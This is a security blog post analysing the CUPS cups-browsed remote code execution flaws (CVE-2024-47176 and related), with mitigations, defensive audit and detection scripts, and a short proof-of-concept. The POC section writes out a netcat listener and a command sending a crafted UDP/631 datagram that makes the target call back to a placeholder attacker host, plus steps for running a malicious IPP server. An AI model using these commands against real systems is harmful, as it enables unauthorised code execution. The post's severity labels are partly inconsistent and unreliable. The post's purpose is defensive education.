OpenPrinting CUPS RCE Analysis and POC - CVE-2024-47176

Berkay Soylu
Posted: October 9, 2024

CUPS, an open-source printing system, is vulnerable to multiple unauthenticated remote code execution vulnerabilities tracked as CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177.

As you read you will also learn:

  • Vulnerability: CUPS vulnerabilities analysis
  • Introduction: Overview of CUPS, mention of SonicWall discovery
  • CUPS CVEs: Details on pre-authenticated RCE vulnerabilities
  • Severity & Affected Versions: Information on affected versions
  • Exploitation Status: Vulnerability exploitation in the wild
  • Exploitation Overview: General overview of the vulnerability and its impact
  • Proof-of-Concept: Demonstration of the exploit with a proof-of-concept
  • Detection: Identifying signs of exploitation of the CUPS vulnerabilities
  • Mitigations: Suggested mitigations for the CUPS vulnerabilities
  • Conclusion: Summary of key findings and potential risks
  • References: Citations and sources for further reading

TL;DR

This report focuses on the critical vulnerabilities in CUPS (Common Unix Printing System) identified as CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177. These vulnerabilities allow for remote code execution (RCE) and the injection of malicious code through the manipulation of Internet Printing Protocol (IPP) data. These flaws are found in key components of the CUPS system, affecting Unix-like operating systems such as Linux and macOS. Immediate patching and security mitigation strategies are essential to prevent exploitation.

Introduction

The Common Unix Printing System (CUPS) is an essential printing framework widely utilized in Unix-like operating systems, including various distributions of Linux and macOS. By implementing the Internet Printing Protocol (IPP), CUPS facilitates seamless printing services over local and networked environments, allowing users to manage and deploy printers efficiently.

In October 2024, security researchers revealed four critical vulnerabilities—CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177—that significantly threaten the integrity of systems running CUPS. These vulnerabilities primarily target key libraries and services such as libcupsfilters, libppd, and the cups-browsed service. The risks associated with these flaws are intensified by the fact that they allow attackers to remotely execute arbitrary code without requiring authentication, thus posing a severe threat to the confidentiality, integrity, and availability of the affected systems.

The impact of these vulnerabilities is significant, as many organizations rely on CUPS for their printing infrastructure. Reports indicate that thousands of CUPS installations are publicly accessible, increasing the risk of exploitation.

By understanding the nature of these vulnerabilities and proactively addressing them, organizations can enhance their security posture and protect their systems from potential malicious attacks. This blog article aims to provide valuable insights into these vulnerabilities, enabling organizations to take the necessary steps to safeguard their infrastructure.

Severity & Affected Versions

The vulnerabilities CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177 are categorized as critical, with CVSS scores indicating their potential impact on affected systems. Specifically:

CVSS Scores:

  • CVE-2024-47076 has a CVSS score of 8.6, representing a critical level of severity due to the ability of an attacker to send malicious IPP requests to manipulate printer settings and execute arbitrary code.
  • CVE-2024-47175 also scores 8.6, allowing for a similar type of remote code execution through crafted print job submissions, targeting vulnerabilities in the PPD file processing.
  • CVE-2024-47176 carries a CVSS score of 5.3, reflecting the potential for exploitation via the cups-browsed service.
  • CVE-2024-47177 is another critical vulnerability, scoring 9.0 (previously 9.9), as it allows attackers to bypass security measures by sending malformed IPP requests.

The vulnerabilities impact several versions of CUPS, particularly those released before the patches were applied. Notably, CUPS versions prior to 2.0.1 are vulnerable to these exploits. Users and administrators are strongly advised to check their installations against the following affected versions:

Versions Affected:

  • CVE-2024-47176: cups-browsed service versions through 2.0.1
  • CVE-2024-47076: libcupsfilters library versions through 2.1b1
  • CVE-2024-47175: libppd library versions through 2.1b1
  • CVE-2024-47177: cups-filters package versions through 2.0.1

Most Linux distributions, including Ubuntu, Debian, Fedora, and others that use CUPS, are affected.

Exploitation Status

The exploitation of CUPS vulnerabilities CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177 has been documented in the wild, with researchers and security analysts reporting limited but significant cases of active exploitation. These vulnerabilities allow attackers to remotely exploit the CUPS print service infrastructure, often leading to full system compromise due to the privileged nature of the CUPS daemon.

Mitigation

To protect against the CUPS vulnerabilities (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, CVE-2024-47177):

Apply Security Patches: Update CUPS and related libraries to their latest versions using your system's package manager, then restart the service so the patched binaries are in use:

sudo apt update && sudo apt upgrade

sudo systemctl restart cups.service

Regularly check for updates as new security fixes are released.

Disable the cups-browsed Service: Stop it now and prevent it from starting again at boot:

sudo systemctl stop cups-browsed

sudo systemctl disable cups-browsed

This ensures the service is not running and cannot be exploited.

Block Access to UDP Port 631: Update your firewall rules to block UDP port 631, the port cups-browsed listens on:

sudo ufw deny proto udp from any to any port 631

Firewall rules can be used to prevent access to the vulnerable services.

These actions will reduce exposure to the vulnerabilities while patches are being rolled out.
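For administrators who need to keep cups-browsed running, the setting worth auditing is BrowseRemoteProtocols in /etc/cups/cups-browsed.conf: the daemon only opens its UDP/631 listener when the legacy cups protocol is named there, so setting the directive to none removes the listener that CVE-2024-47176 abuses. The script below is an added example for this post (not code from the original article or from the cups-browsed project). It reports whether the legacy protocol is still enabled and writes out a hardened copy of the file. It assumes the packaged default is dnssd cups when the directive is absent (check the config your distribution ships); the sample configuration text is constructed.

```python
"""Audit /etc/cups/cups-browsed.conf for the legacy browsing protocol.

Added example for this post (not code from the original article or from the
cups-browsed project). cups-browsed listens on UDP/631 for the legacy "cups"
browsing protocol only when that protocol is named in BrowseRemoteProtocols
(or in BrowseProtocols, which sets the remote and local lists together).
Assumption: when no directive is present the packaged default "dnssd cups"
applies. The sample configuration text is constructed for this example.
"""
import re

DEFAULT_REMOTE_PROTOCOLS = "dnssd cups"  # assumed packaged default, see docstring
DIRECTIVE_RE = re.compile(r"^Browse(?:Remote)?Protocols\s+(.+?)\s*$", re.IGNORECASE)


def remote_protocols(conf_text: str) -> set:
    """Return the protocol names in effect after the last matching directive."""
    value = DEFAULT_REMOTE_PROTOCOLS
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and surrounding space
        m = DIRECTIVE_RE.match(line)
        if m:
            value = m.group(1)  # a later directive overrides an earlier one
    names = {p.lower() for p in value.split()}
    return set() if names == {"none"} else names


def legacy_cups_browsing_enabled(conf_text: str) -> bool:
    """True if cups-browsed would still accept the UDP/631 legacy protocol."""
    return "cups" in remote_protocols(conf_text)


def hardened_conf(conf_text: str) -> str:
    """Return the config with every Browse[Remote]Protocols line replaced by 'none'."""
    kept = [ln for ln in conf_text.splitlines() if not DIRECTIVE_RE.match(ln.strip())]
    kept.append("BrowseRemoteProtocols none")
    return "\n".join(kept) + "\n"


# Constructed sample: the weak setting the audit should report.
SAMPLE_CONF = """\
# cups-browsed.conf (constructed sample)
BrowseRemoteProtocols dnssd cups
BrowseLocalProtocols none
"""

if __name__ == "__main__":
    print("legacy cups browsing enabled:", legacy_cups_browsing_enabled(SAMPLE_CONF))
    print(hardened_conf(SAMPLE_CONF))
```

Run it against the real file with `python3 audit.py` after pointing SAMPLE_CONF at the contents of /etc/cups/cups-browsed.conf; restart cups-browsed after writing the hardened copy so the change takes effect.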

Analysis of CVE-2024-47176

The core of the vulnerability involves exploiting CUPS by tricking it into generating a malicious PostScript Printer Description (PPD) file. This file contains attacker-controlled commands. When a print job is sent to the compromised printer, the command is executed with the privileges of the "lp" user (which is the user under which CUPS runs). While this user typically does not have elevated privileges, this method can be an entry point for further attacks.


There are two primary methods to generate the malicious PPD file:

Local Network via mDNS: An attacker can use multicast DNS (mDNS) to automatically register a new printer or replace the PPD file of an existing printer. This requires the attacker to generate multicast datagrams and deliver them to the cups-browsed daemon on port 631. While multicast traffic doesn’t travel across the Internet, local network attacks are still significant, especially in unprotected environments.

Any Network via Legacy UDP Protocol: The attacker can also exploit a legacy UDP-based protocol to register a new printer with a malicious PPD file from any network, including over the Internet. This involves sending a crafted UDP datagram to port 631, which is processed by the cups-browsed service. Proper firewall configurations or a NAT router can mitigate this attack by blocking access to port 631.
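On the wire, the second path is a single text datagram in the legacy CUPS browsing format: a printer type, a printer state and the URI of the advertised printer. The classifier below is an added example for this post (not code from the original article or from the CUPS project) showing the check a sensor watching UDP port 631 would run: it parses the datagram and raises an alert when it is malformed or when the advertised URI points outside the networks and domain where printers are expected to live. The allowed networks, the domain suffix and the sample datagrams are constructed assumptions.

```python
"""Classify a legacy CUPS browse datagram as received by cups-browsed on UDP/631.

Added example for this post (not code from the original article or from the
CUPS project). The legacy browsing protocol is one text line per datagram:

    <printer-type> <printer-state> <printer-uri> ["location" "info" "make-and-model" ...]

The first two fields are numbers (CUPS's original browse packets wrote them in
hexadecimal, so they are parsed as hex here; "0 3" reads the same either way).
The allowed networks, domain suffix and sample datagrams are constructed.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Assumption: where this organisation's printers live (adjust to your environment).
ALLOWED_PRINTER_NETWORKS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("192.168.0.0/16"),
]
ALLOWED_PRINTER_DOMAINS = ("print.example.internal",)  # assumed internal DNS suffix
ALLOWED_SCHEMES = ("ipp", "ipps", "http", "https")

HEX_FIELD = re.compile(r"^(?:0x)?[0-9a-fA-F]+$")


def parse_browse_datagram(payload: bytes) -> dict:
    """Split a browse datagram into its fields, raising ValueError if malformed."""
    text = payload.decode("utf-8", errors="replace").strip()
    fields = text.split(None, 3)  # type, state, uri, optional quoted strings
    if len(fields) < 3:
        raise ValueError("fewer than three fields")
    ptype, state, uri = fields[:3]
    if not (HEX_FIELD.match(ptype) and HEX_FIELD.match(state)):
        raise ValueError("printer-type and printer-state are not numeric")
    return {
        "type": int(ptype, 16),
        "state": int(state, 16),
        "uri": uri,
        "extra": fields[3] if len(fields) > 3 else "",
    }


def classify_browse_datagram(payload: bytes) -> tuple:
    """Return ("ok" | "alert", reason) for one datagram seen on UDP/631."""
    try:
        pkt = parse_browse_datagram(payload)
    except ValueError as exc:
        return "alert", f"malformed browse datagram ({exc})"

    parts = urlsplit(pkt["uri"])
    if parts.scheme not in ALLOWED_SCHEMES:
        return "alert", f"unexpected URI scheme {parts.scheme!r}"
    host = parts.hostname
    if not host:
        return "alert", "printer-uri has no host"

    # The host may be a literal address or a name; accept only known printer ranges/domains.
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        if host.endswith(ALLOWED_PRINTER_DOMAINS):
            return "ok", f"printer-uri host {host} is under an allowed domain"
        return "alert", f"printer-uri host {host} is outside allowed printer domains"
    if any(addr in net for net in ALLOWED_PRINTER_NETWORKS):
        return "ok", f"printer-uri host {host} is on an allowed printer network"
    return "alert", f"printer-uri host {host} is outside allowed printer networks"


# Constructed datagrams: a legitimate advertisement, one pointing off-network, and junk.
SAMPLE_DATAGRAMS = [
    b'0 3 ipp://10.20.30.40:631/printers/office-a "2nd floor" "Office A" "Generic PCL"',
    b"0 3 http://203.0.113.7:1234/printers/LetsDefend",
    b"not a browse packet",
]

if __name__ == "__main__":
    for dg in SAMPLE_DATAGRAMS:
        verdict, reason = classify_browse_datagram(dg)
        print(f"{verdict:5} {reason}")
```

Feed it the payload of each UDP/631 datagram from a capture and route every "alert" verdict to the same place as the log findings in the detection section; an advertisement from a host that is not a printer is the earliest observable stage of this attack.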

Exploitation of CVE-2024-47176 (POC)

Exploiting the vulnerabilities tracked as CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177 involves tricking the CUPS system into processing malicious IPP (Internet Printing Protocol) attributes that lead to arbitrary code execution. Here's a closer look at how these vulnerabilities can be exploited:

Verifying Vulnerable Targets

To determine if a target CUPS instance is vulnerable, an attacker can set up a Netcat listener on their own machine. This can be done with the following command:

netcat -nvlp 4444

This command opens a listener on port 4444, waiting for any incoming connections.

Once the listener is set up, the attacker can send a specially crafted payload to the target CUPS instance's UDP service, typically operating on port 631. This is achieved using the following command:

echo '0 3 http://<attacker-ip>:<port>/printers/LetsDefend' | nc -nu <target-ip> 631

In this command, replace <attacker-ip> and <port> with the address and port of the attacker's listener (4444 in the listener command above) and <target-ip> with the target's IP address. The command sends a single UDP datagram that attempts to exploit the vulnerabilities in the CUPS service.

If the target is vulnerable, processing the datagram will trigger a callback from the target to the attacker's listener, allowing them to capture any data sent back from the target system. This response can potentially contain sensitive information or confirmation of successful exploitation.

Setting Up the IPP Server

To exploit the CUPS vulnerabilities (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177), you will need to set up an IPP (Internet Printing Protocol) server. You can use the ipp-server project available on GitHub. Follow these steps to get it running:


Clone the Repository: Open your terminal and run:

git clone https://github.com/h2g2bob/ipp-server.git

Run the Server: Change into the cloned directory and start the IPP server (it is a Python project, so there is nothing to compile) with the default configuration, which is usually adequate for testing:

python -m ippserver --port 1234 save /tmp/

Running the Exploit

Once the IPP server is running, the exploitation involves running a custom Python script that leverages the malicious behavior of the server. This script is designed to interact with the CUPS service and exploit the vulnerabilities identified.

You can modify the Python script as you wish:

https://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1

By browsing to localhost:631 on the victim machine, you can see that the printer set up by the exploit has been added to the "Printers" section.

Once the user attempts to print using the malicious printer set up by the exploit, the malicious code embedded in the printer's attributes will execute on the target system. This happens because the printer attributes include commands defined in the exploit, which are processed by the target CUPS service when a print job is initiated.

Detection of CVE-2024-47176

Detecting exploitation of CUPS vulnerabilities such as CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177 involves a combination of log analysis, system behavior monitoring, and traffic inspection. Below are key strategies for detection:

1. Monitor CUPS Logs

The first line of defense is to inspect the CUPS log files (/var/log/cups/access_log, /var/log/cups/error_log) for any unusual activity, especially:

  • Requests or operations related to printers that were not manually configured.
  • Unauthorized or unusual printer registrations, especially those involving multicast DNS (mDNS) or unexpected UDP traffic.
  • Suspicious PPD file manipulations, especially unexplained updates or replacements.

2. Network Traffic Monitoring

Set up network traffic monitoring tools to capture any suspicious UDP or mDNS traffic targeting port 631 (the port used by CUPS). Detecting unexpected or malicious datagrams, particularly from unfamiliar devices or networks, can help identify an attack.

3. Monitor Process Activity of the "lp" User

Since exploitation may allow execution of commands as the lp user, review activity by this user. Check for any unusual commands or file changes initiated by the lp user, especially outside of normal printing processes.

By regularly analyzing logs and monitoring network traffic, you can effectively detect attempts to exploit CUPS vulnerabilities and take action before serious damage occurs.
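To turn the log checks above into something that runs, here is an added example for this post (not code from the original article or from the CUPS project): a scanner over access_log lines that flags queue registrations by anyone other than an administrator, print jobs sent to queues nobody configured by hand, and PPD reads for such queues. The line layout is CUPS's own access_log format; the queue allowlist, the administrator list and the sample log lines are constructed.

```python
"""Scan CUPS access_log lines for the indicators listed above.

Added example for this post (not code from the original article or from the
CUPS project). The line layout is the CUPS access_log format:

    host group user [date] "method resource version" status bytes ipp-operation ipp-status

The queue allowlist, the accounts allowed to administer queues and the sample
log lines are constructed for this example.
"""
import re

ACCESS_RE = re.compile(
    r'^(?P<host>\S+) (?P<group>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<resource>\S+) (?P<version>[^"]+)" '
    r'(?P<status>\d+) (?P<bytes>\d+)(?: (?P<op>\S+) (?P<ipp_status>\S+))?$'
)
KNOWN_QUEUES = {"office-a", "lobby"}   # constructed: queues an administrator set up by hand
QUEUE_ADMINS = {"admin"}               # constructed: accounts expected to add or modify queues
QUEUE_CHANGE_OPS = {"CUPS-Add-Modify-Printer", "CUPS-Add-Modify-Class", "CUPS-Delete-Printer"}
PRINT_OPS = {"Print-Job", "Create-Job", "Send-Document"}


def parse_access_line(line: str):
    """Return the fields of one access_log line, or None if it does not parse."""
    m = ACCESS_RE.match(line.strip())
    return m.groupdict() if m else None


def queue_name(resource: str):
    """Extract the queue name from /printers/<name> or /classes/<name>[.ppd]."""
    m = re.match(r"^/(?:printers|classes)/([^/?]+)", resource)
    if not m:
        return None
    name = m.group(1)
    return name[:-4] if name.endswith(".ppd") else name


def scan_access_log(lines):
    """Return (severity, message) findings for the checks described in the text above."""
    findings = []
    for line in lines:
        rec = parse_access_line(line)
        if rec is None:
            continue
        op, queue = rec["op"], queue_name(rec["resource"])
        if op in QUEUE_CHANGE_OPS and rec["user"] not in QUEUE_ADMINS:
            # Queue registration by anyone but an administrator. These requests are
            # typically POSTed to /admin/, so the queue name is not visible in this log.
            findings.append(("high", f"{op} by {rec['user']!r} from {rec['host']}"))
        elif op in PRINT_OPS and queue and queue not in KNOWN_QUEUES:
            # A job on an unknown queue is the moment a planted PPD's commands would run.
            findings.append(("high", f"{op} to unknown queue {queue} from {rec['host']}"))
        elif rec["resource"].endswith(".ppd") and queue and queue not in KNOWN_QUEUES:
            # PPD fetched for a queue nobody configured by hand.
            findings.append(("medium", f"PPD of unknown queue {queue} read from {rec['host']}"))
    return findings


# Constructed sample: one legitimate job, one admin change, then the pattern to catch.
SAMPLE_ACCESS_LOG = """\
localhost - - [09/Oct/2024:10:00:01 +0000] "POST /printers/office-a HTTP/1.1" 200 3560 Print-Job successful-ok
localhost - admin [09/Oct/2024:10:05:12 +0000] "POST /admin/ HTTP/1.1" 200 163 CUPS-Add-Modify-Printer successful-ok
localhost - lp [09/Oct/2024:10:07:44 +0000] "POST /admin/ HTTP/1.1" 200 181 CUPS-Add-Modify-Printer successful-ok
localhost - - [09/Oct/2024:10:09:03 +0000] "GET /printers/LetsDefend.ppd HTTP/1.1" 200 9120 - -
localhost - - [09/Oct/2024:10:09:05 +0000] "POST /printers/LetsDefend HTTP/1.1" 200 2048 Print-Job successful-ok
"""

if __name__ == "__main__":
    for severity, message in scan_access_log(SAMPLE_ACCESS_LOG.splitlines()):
        print(f"[{severity}] {message}")
```

Point scan_access_log at the lines of /var/log/cups/access_log on a host and seed KNOWN_QUEUES from the queues you configured yourself; every queue that cups-browsed created from a network advertisement will then stand out the first time a job is sent to it.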

LetsDefend Simulated SOC Alerts

On the LetsDefend platform, you can practice by analyzing the latest zero-days in a realistic SOC environment. You can investigate EventID:307 - SOC329 - CUPS RCE Detection via IPP Injection (CVE-2024-47177) and learn how attackers exploit vulnerabilities to gain unauthorized access and execute malicious code.

https://app.letsdefend.io/alerts/307

Conclusion

The vulnerabilities in CUPS—CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177—pose a critical security threat to Unix-based systems. Attackers can exploit these flaws to gain remote access, control print jobs, and inject malicious code into affected systems. With many servers publicly exposed via the IPP protocol, the attack surface is broad, requiring organizations to act swiftly by updating vulnerable CUPS versions and tightening network security.

References

  • https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
  • https://ubuntu.com/blog/cups-remote-code-execution-vulnerability-fix-available
  • https://threatprotect.qualys.com/2024/09/27/cups-printing-systems-remote-code-execution-vulnerability-cve-2024-47176-cve-2024-47076-cve-2024-47175-cve-2024-47177/
  • https://github.com/OpenPrinting/libcupsfilters/security/advisories/GHSA-w63j-6g73-wmg5
  • https://github.com/OpenPrinting/libppd/security/advisories/GHSA-7xfx-47qg-grp6
  • https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8
  • https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-p9rh-jxmq-gq47
  • https://ubuntu.com/security/CVE-2024-47076
  • https://ubuntu.com/security/CVE-2024-47175
  • https://ubuntu.com/security/CVE-2024-47176
  • https://ubuntu.com/security/CVE-2024-47177
  • https://ubuntu.com/security/notices/USN-7041-1
  • https://ubuntu.com/security/notices/USN-7042-1
  • https://ubuntu.com/security/notices/USN-7043-1
  • https://ubuntu.com/security/notices/USN-7044-1
  • https://ubuntu.com/security/notices/USN-7045-1
  • https://www.cve.org/CVERecord?id=CVE-2024-47076
  • https://www.cve.org/CVERecord?id=CVE-2024-47175
  • https://www.cve.org/CVERecord?id=CVE-2024-47176
  • https://www.cve.org/CVERecord?id=CVE-2024-47177
